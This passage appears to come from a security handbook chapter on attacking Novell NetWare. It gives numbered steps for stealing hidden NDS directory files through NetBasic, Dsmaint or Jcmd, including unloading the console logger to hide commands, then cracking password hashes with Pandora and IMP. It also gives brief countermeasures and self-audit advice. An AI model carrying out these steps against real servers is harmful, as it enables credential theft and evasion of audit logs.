Popularity: 8
Simplicity: 8
Impact: 10
Risk Rating: 9
Once therconsolepassword has been acquired, the final step is to gain access to the NDS files. Novell stores its NDS files in a hidden directory called _netware on the SYS volume. The only way to access that directory is through console access (rconsoleto the attacker). A number of techniques exist for grabbing these NDS files, and you’ll find cer- tain attackers have their favorite.
] NetBasic.nlm (SYS:SYSTEM)
NetBasic Software Development Kit (SDK) is a product originally written by High Tech- nology Software Corp. (HiTecSoft for short). The product allows the conversion of NetBasic scripts into Novell NLMs for use on NetWare web servers. The back-end com- ponent, netbasic.nlm, has a unique capability, originally discovered by an attacker:
browse the entire volume from a command line including the hidden _netware directory.
NetBasic is installed by default on all NetWare 4.xinstallations, so it’s our favorite technique for gaining access to NDS files. Also, NetBasic is the only NDS pilfer technique that copies the files without closing Directory Services. Here are the steps and commands you’ll need to carry it out:
1. Gainrconsoleaccess with the SYS:\PUBLIC\rconsolecommand.
2. unload conlog(This will remove the console logger and any record of your commands.)
3. load netbasic.nlm 4. shell
5. cd \_netware(This directory is a hidden system directory only visible from the system console.)
6. md \login\nds
7. copy block.nds \login\nds\block.nds
8. copy entry.nds \login\nds\entry.nds
9. copy partitio.nds \login\nds\partitio.nds 10. copy value.nds \login\nds\value.nds
11. exit(This exits the shell.) 12. unload netbasic
13. load conlog(to return conlog status to normal)
14. From a client, use themapcommand to map a drive to the LOGIN\NDS directory created earlier.
15. Copy the *.NDS files to your local machine.
16. Start cracking.
] DsmaintIf security-savvy NetWare administrators are loose on this server, NetBasic will be un- available. In this case, you will need an alternative: Dsmaint. This NLM is not standard with NetWare 4.11 installation, but can be downloaded from Novell at http://www .support.novell.com. The file is DS411P.EXE and can be found on Novell’s “Minimum Patch List” web page at http://www.support.novell.com. But be forewarned, Dsmaint’s upgrade function automatically closes DS, so you don’t want to perform this during peak usage times. To return DS to its original, functional form, you must run a Dsmaint restore operation. In other words, you do not want to do this on a production server.
1. Map a drive to SYS:SYSTEM.
2. Copydsmaint.nlmto the mapped drive.
3. Gain rconsole access with therconsolecommand.
4. Typeunload conlog.(This will remove the console logger and any record of your commands.)
5. Typeload dsmaint.
6. Choose Prepare NDS For Hardware Upgrade.
7. Log in as Admin.
This will unload Directory Services.
The backup.nds file will then be automatically saved in SYS:SYSTEM.
1. Choose Restore NDS Following Hardware Upgrade.
2. Typeload conlog.
3. From your client, map a drive to SYS:SYSTEM.
4. Copy the backup.nds file to your local system.
5. Use theextractfunction from Pandora to create the four NDS files (block, entry, partitio, and value).
6. Start cracking.
The older dsrepair.nlm also provides the ability to prepare for hardware upgrades, which backs up the NDS files in SYS:SYSTEM. However, this version of dsrepair should only be used with older versions of NetWare 4.x,and especially not with those upgraded with Support Packs.
] JcmdJRB Software Limited has produced excellent NetWare utilities for over six years, many of which can be used to audit your NetWare server’s security. But unlike NetBasic, Jcmd is not able to copy NDS files when they are open. So, like the dsmaint.nlm, Jcmd is not recom- mended on production systems. To get around this limitation, you must unload Directory Services. Use the following steps and commands to copy the NDS files using Jcmd:
1. Map a drive to SYS:SYSTEM.
2. Copy Jcmd.nlm to the mapped drive.
3. Gainrconsoleaccess with the SYS:\PUBLIC\rconsolecommand.
4. unload conlog(This will remove the console logger and any record of your commands.)
5. unload ds 6. load jcmd
7. cd \_netware(A screen like the one shown next will be displayed.)
8. dir *.*(You need the wildcard (*.*) to see the files with Jcmd.) 9. md \login\nds
10. copy block.nds \login\nds 11. copy entry.nds \login\nds 12. copy partitio.nds \login\nds 13. copy value.nds \login\nds 14. exit(This exits the shell.) 15. load ds
16. load conlog
17. From a client, use themapcommand to map a drive to the SYS:LOGIN directory.
18. Copy the *.NDS files to your local machine.
19. Start cracking.
U Grabbing NDS Countermeasure
The countermeasure for the NDS capture goes back to reducing the number of weapons given to the attacker to use.
1. Encrypt therconsolepassword—described earlier.
2. Removenetbasic.nlmfrom SYS:\SYSTEM andpurgethe directory. The netbasic.nlmis usually unnecessary.
] Cracking the NDS Files
Once attackers download your NDS files, the party is pretty much over. You obviously never want to let attackers get to this point. Once NDS files are obtained, attackers will undoubtedly try to crack these files by using an NDS cracker. Using freeware products like IMP from Shade and Pandora’scryptoorcrypto2, anyone can crack these files.
From an administrator’s point of view, it is a good idea to download your own NDS files in the same manner and try to crack users’ passwords yourself. You can fire off a crack with a very large dictionary file, and when a user’s password is revealed, you can notify the user to change his or her password. Beyond the simple security auditing, this exercise can be enlightening, as it will tell you how long your users’ passwords are.
Cryptoandcrypto2from Pandora can be used, respectively, to brute force and dic- tionary crack the NDS files. To get cracking, you can follow these steps:
1. Copy the backup.nds or backup.ds files in your \PANDORA\EXE directory.
2. Use theextractutility to pull the four NDS files from backup.nds:
extract -d
3. Use the extract utility again to pull the password hashes from the NDS files and create a password.nds file, as shown in the following illustration.
extract –n
4. Now runcryptoorcrypto2to brute force or dictionary crack the password.nds file, as shown in the following illustration.
crypto –u Admin
crypto2 dict.txt –u deoane
] IMP 2.0IMP from Shade has both dictionary-crack and brute-force modes as well, but in graphical format. The dictionary crack is incredibly fast—blowing through 933,224 dictionary words takes only a couple minutes on a 200MHz Pentium II. The only limitation in IMP is with the brute forcer—usernames selected must be all the same-length password (but IMP
kindly displays the length next to the username). IMP can be found at http://www .wastelands.gen.nz/.
The four NDS files either copied using the NetBasic technique or generated from the Pandora extract tool include block.nds, entry.nds, partitio.nds, and value.nds. The only file you’ll need to begin cracking is partitio.nds. Open IMP and load it from disk.
Then choose either Dictionary or Brute Force cracking, and let it run.
IMP will display the entire tree with each user to crack and their password length, as shown in Figure 7-8. This is important for two reasons:
▼ It helps you understand what length of passwords your users have.
▲ You can orient your brute-force attacks (which can take some time) to attack only those with short passwords (fewer than seven or eight characters).
Figure 7-8. IMP gives attackers valuable information that will help them hone their attacks